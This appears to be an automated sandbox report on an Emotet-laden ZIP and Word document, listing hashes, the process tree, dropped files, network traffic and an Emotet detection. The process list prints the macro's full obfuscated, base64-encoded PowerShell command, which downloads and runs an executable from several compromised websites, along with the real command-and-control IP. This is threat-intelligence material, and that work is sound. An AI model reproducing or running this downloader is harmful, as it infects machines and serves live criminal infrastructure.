File name: | File_1766.zip |
Full analysis: | https://app.any.run/tasks/225324d5-ceb5-4748-9cc8-3a2e3e4c5d4e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 19, 2020, 23:39:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v5.1 to extract |
MD5: | 4B9D2049561A73046F2D014ECFFC5F0C |
SHA1: | 2AD27F5207C8D8D2B26E9F168F39CA2837B826C6 |
SHA256: | A4ECCC56534670592507623E49CDF21B7EF78A85983228645AFB95F80DF4BBF3 |
SSDEEP: | 1536:Uqzj+V9D0SQ1/HVcHrsWQ5RLUBGJEhI0I1itMPsYnzxol0zCpKHjb:UqzQ9DPiPorpQ5RLUBhS2AsQc0zUKHjb |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 51 |
---|---|
ZipBitFlag: | 0x0003 |
ZipCompression: | Unknown (99) |
ZipModifyDate: | 2020:10:20 01:55:01 |
ZipCRC: | 0x1359e5a9 |
ZipCompressedSize: | 80577 |
ZipUncompressedSize: | 157835 |
ZipFileName: | File_1766.doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3048 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\File_1766.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3852 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\File_1766.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3532 | POwersheLL -ENCOD IAAgAHMAZQBUAC0AaQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABlADoAOABMAGkAIAAgACgAIABbAHQAWQBwAEUAXQAoACcAUwB5ACcAKwAnAFMAVAAnACsAJwBFACcAKwAnAE0AJwArACcALgBpAE8ALgBEAEkAJwArACcAUgBFAEMAdABvAFIAWQAnACkAIAAgACkAIAA7ACAAIAAgACAAcwBFAHQALQBpAHQARQBNACAAKAAiAFYAYQBSACIAKwAiAGkAIgArACIAQQAiACsAIgBCAGwAZQA6ADIAaABGAEwAIgArACIAcAAiACkAIAAoAFsAVABZAHAAZQBdACgAJwBzAFkAUwB0ACcAKwAnAGUAbQAuACcAKwAnAE4AZQBUAC4AUwBlAHIAVgAnACsAJwBpAGMAZQBQAG8AaQAnACsAJwBuAFQAJwArACcAbQBhAG4AQQBHAEUAcgAnACkAKQAgACAAOwAgAFMAdgAgACgAJwBrACcAKwAnAFIANwAnACkAIAAgACgAIABbAHQAWQBwAGUAXQAoACcAcwB5ACcAKwAnAHMAVAAnACsAJwBFAG0ALgBuAEUAdAAuAFMAZQBDAHUAcgBJACcAKwAnAHQAeQBQAFIAJwArACcAbwAnACsAJwBUAG8AYwBvAGwAJwArACcAVAAnACsAJwB5AHAARQAnACkAKQAgADsAJABOADYAMgBzAGkAbgB6AD0AKAAnAFgAJwArACcAbABuAHMAMABlAHkAJwApADsAJABZADIAYwBtAHEAZABrAD0AJABEADgANwAwADYAOQBjACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQAQQBnAGQAZQA0ADAAdwA7ACQAVwAxADQAdwBtADMAZgA9ACgAJwBLAHgAawBkAGgAXwAnACsAJwBzACcAKQA7ACAAIAAoAFYAYQBSAGkAYQBiAEwARQAgACAAOABsAGkAKQAuAFYAYQBsAFUAZQA6ADoAYwByAEUAYQBUAGUAZABpAFIAZQBjAHQATwBSAFkAKAAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACAAKwAgACgAKAAnAFcAWQBUAEQAZAAnACsAJwAwAGcAcAB2AHMAVwBZACcAKwAnAFQAVQBnAHUAbwBmAGIANwBXAFkAJwArACcAVAAnACkALgBSAGUAcABsAGEAQwBFACgAKABbAGMAaABhAHIAXQA4ADcAKwBbAGMAaABhAHIAXQA4ADkAKwBbAGMAaABhAHIAXQA4ADQAKQAsAFsAcwB0AHIAaQBuAGcAXQBbAGMAaABhAHIAXQA5ADIAKQApACkAOwAkAE4AOABrAGoAZgA5AHMAPQAoACcAVQA3AHMAYgBrACcAKwAnAHYAcwAnACkAOwAgACAAKABHAGUAdAAtAFYAQQBSAEkAYQBiAGwARQAgACAAKAAiADIAIgArACIASABmAEwAUAAiACkAIAAgAC0AdgBhAGwAdQBlAG8AbgBsAFkAIAApADoAOgBTAGUAQwBVAFIAaQB0AFkAcAByAG8AVABPAEMATwBMACAAPQAgACAAKABDAGgAaQBsAEQASQBUAGUATQAgACAAKAAiAHYAQQBSACIAKwAiAEkAYQBiACIAKwAiAGwAZQA6AEsAUgA3ACIAKQAgACkALgBWAGEATABVAGUAOgA6AHQAbABzADEAMgA7ACQAUwBxAHkAagBsAGMAawA9ACgAJwBUAGQAdQBoACcAKwAnAHgAXwAnACsAJwB4ACcAKQA7ACQATABzAHgANwBrAG0AbQAgAD0AIAAoACcAUgBvAHcAJwArACcAOAB5ACcAKwAnAG4AJwApADsAJABZAGgAaAA1AHEAawBkAD0AKAAnAFUAZQBtACcAKwAnAG4AMwBtAGkAJwApADsAJABMAHcAOQBzAGIAbgBsAD0AKAAnAFUAJwArACcAagByAG4AOABfACcAKwAnAHcAJwApADsAJABTAHAAawBiAGIANABkAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAGgARwB0AEQAZAAnACsAJwAwACcAKwAnAGcAcAB2AHMAJwArACcAaAAnACsAJwBHAHQAVQAnACsAJwBnAHUAbwBmACcAKwAnAGIANwBoAEcAdAAnACkALgByAGUAUABsAEEAQwBlACgAKABbAEMAaABBAHIAXQAxADAANAArAFsAQwBoAEEAcgBdADcAMQArAFsAQwBoAEEAcgBdADEAMQA2ACkALAAnAFwAJwApACkAKwAkAEwAcwB4ADcAawBtAG0AKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAEoAeQAxAGIAZABpADYAPQAoACcAUQAnACsAJwB3ACcAKwAnADIAYwBsAHcANwAnACkAOwAkAE0AagBqAGoANABwAGMAPQBuAGAARQBgAFcALQBvAGIASgBFAEMAVAAgAE4ARQB0AC4AdwBFAEIAYwBsAEkARQBuAFQAOwAkAEUAeABtAGcAXwA3AGoAPQAoACcAaAB0ACcAKwAnAHQAcABzADoALwAvAHkAaQAnACsAJwB4ACcAKwAnAHUAZQBjAG8AJwArACcAdQByAHMAZQAuAGMAJwArACcAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzACcAKwAnAC8AdwAnACsAJwBFAC8AKgBoAHQAJwArACcAdAAnACsAJwBwAHMAOgAvACcAKwAnAC8AZQBzAHQAJwArACcAeQBsAG8AaABvACcAKwAnAHUAcwBlAC4AYwBvACcAKwAnAG0ALwBwAG0AJwArACcAcwAvAGEAJwArACcAcABwAGwAJwArACcAaQAnACsAJwBjAGEAdABpACcAKwAnAG8AJwArACcAbgAvAGwAYQBuAGcAdQBhAGcAZQAvAGUAJwArACcALwAnACsAJwAqACcAKwAnAGgAdAB0AHAAOgAvAC8AJwArACcANwA3AHcAaQBuAHMAJwArACcALgBjACcAKwAnAGwAdQAnACsAJwBiAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAnACsAJwAvADQAJwArACcAeQAvACoAaAB0AHQAcABzADoALwAvAGwAYQB5AGEAZwByACcAKwAnAG8AdQBwAC4AbgBlACcAKwAnAHQALwB3AHAALQBhAGQAbQAnACsAJwBpACcAKwAnAG4AJwArACcALwA1AGgALwAqACcAKwAnAGgAJwArACcAdAB0AHAAcwA6AC8ALwAnACsAJwB6ACcAKwAnAGkAbwBuAGkAbQAnACsAJwBtAGkAJwArACcAZwByAGEAdAAnACsAJwBpAG8AbgAuAGMAbwBtAC8AcwBjAHMAcwAnACsAJwAvAGIASAAnACsAJwBkAC8AKgAnACsAJwBoAHQAJwArACcAdABwAHMAOgAvAC8AdgBpACcAKwAnAHYAbwAnACsAJwBzACcAKwAnAGwAbwB0ACcAKwAnAHAAdQAnACsAJwBsAHMAYQAnACsAJwAuAGMAbwAnACsAJwBtAC8AdwAnACsAJwBwAC0AYwBvAG4AdABlAG4AdAAnACsAJwAvACcAKwAnADEALwAnACsAJwAqAGgAdAB0AHAAcwA6AC8ALwAnACsAJwB3AGkAegB6AGQAbwBtAGgAdQBiAC4AYwBvAG0AJwArACcALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AJwArACcASQBaACcAKwAnAC8AJwApAC4AUwBQAGwASQB0ACgAJABMAGEAZgBrADIANgAzACAAKwAgACQAWQAyAGMAbQBxAGQAawAgACsAIAAkAFgAagBhAGgANAAxAHcAKQA7ACQATgBiAGEAZQB3AGcAawA9ACgAJwBVACcAKwAnADYANgBwAHcAaQAnACsAJwB4ACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBpAGMAbABqAGIAcQAgAGkAbgAgACQARQB4AG0AZwBfADcAagApAHsAdAByAHkAewAkAE0AagBqAGoANABwAGMALgBEAG8AdwBOAGwATwBBAEQARgBpAGwAZQAoACQAUQBpAGMAbABqAGIAcQAsACAAJABTAHAAawBiAGIANABkACkAOwAkAEoANAA4ADcANQBtAHQAPQAoACcAWAAnACsAJwBnAGYAJwArACcANgBpAHgAawAnACkAOwBJAGYAIAAoACgARwBgAEUAVAAtAEkAVABFAG0AIAAkAFMAcABrAGIAYgA0AGQAKQAuAEwARQBOAEcAVABoACAALQBnAGUAIAAzADgANQA5ADAAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAJwB3AGkAbgAzADIAJwArACcAXwAnACsAJwBQAHIAbwBjAGUAcwBzACcAKQApAC4AYwBSAGUAYQBUAGUAKAAkAFMAcABrAGIAYgA0AGQAKQA7ACQAWQB1AGsAdgAzAGQAagA9ACgAJwBZAHMANwBfACcAKwAnAG0AOQB5ACcAKQA7AGIAcgBlAGEAawA7ACQAVgA1AGEANQAxAF8AZwA9ACgAJwBOACcAKwAnAGgAcABiAHEAXwBlACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBwAHoAegBuAHcAdgA9ACgAJwBSAGcAJwArACcAOAA1ACcAKwAnAHgAdAB1ACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1500 | C:\Users\admin\Dd0gpvs\Uguofb7\Row8yn.exe | C:\Users\admin\Dd0gpvs\Uguofb7\Row8yn.exe | wmiprvse.exe | |
User: admin Company: T Integrity Level: MEDIUM Description: TODO: <File descri Exit code: 0 Version: 1.0.0.1 | ||||
2360 | "C:\Users\admin\AppData\Local\oleacchooks\FXSUNATD.exe" | C:\Users\admin\AppData\Local\oleacchooks\FXSUNATD.exe | Row8yn.exe | |
User: admin Company: T Integrity Level: MEDIUM Description: TODO: <File descri Version: 1.0.0.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR724.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3532 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2TUNRQF8TTH5X0JLQ1BQ.temp | — | |
MD5:— | SHA256:— | |||
3852 | WINWORD.EXE | C:\Users\admin\Desktop\~$le_1766.doc | pgc | |
MD5:EE21CA21289CE6E713B1998BC698C17D | SHA256:EFD80184993DACCBD6FC603B36D2ED48CC740312396702741ACE882206BA38B2 | |||
3852 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\File_1766.doc.LNK | lnk | |
MD5:ACCCFE455C9BE1C18672E220DD3BFE64 | SHA256:7F9E5D5B40EEBA00A4BB7B7645F536AD3BE91CD2A6E18321F92448B42FB260D6 | |||
3852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:C17537C9714D8D435258D99912F4C84F | SHA256:DC0BEE4763AD66AC9080D27BA138EA1C887F3BF40B111C9D233BD6943DC5D668 | |||
3852 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4298B3381824ACBAB16D24DB94AF4F72 | SHA256:84B35D8889FD200BD36E3E86D4080E209A0EDE542D193A8095521A6C33D659AC | |||
3532 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
3048 | WinRAR.exe | C:\Users\admin\Desktop\File_1766.doc | document | |
MD5:572C2950C2C420365189B5B8A59C78FD | SHA256:3B15710A3FF2B8F40AF56EF3F69DE2A7D1BC5F6213ED69D4C26E8362AC7E8A68 | |||
1500 | Row8yn.exe | C:\Users\admin\AppData\Local\oleacchooks\FXSUNATD.exe | executable | |
MD5:4CB0A2AA2B1A9DFBD0F4329ACB423377 | SHA256:73AB91B5BD50317226089588BCC6D1618234201BC508A62478C8260529020F33 | |||
3532 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17127e.TMP | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2360 | FXSUNATD.exe | POST | 200 | 186.189.249.2:80 | http://186.189.249.2/T4pro8nv/ | AR | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2360 | FXSUNATD.exe | 186.189.249.2:80 | — | — | AR | malicious |
3532 | POwersheLL.exe | 132.232.249.32:443 | yixuecourse.com | LeaseWeb Netherlands B.V. | NL | unknown |
Domain | IP | Reputation |
---|---|---|
yixuecourse.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2360 | FXSUNATD.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |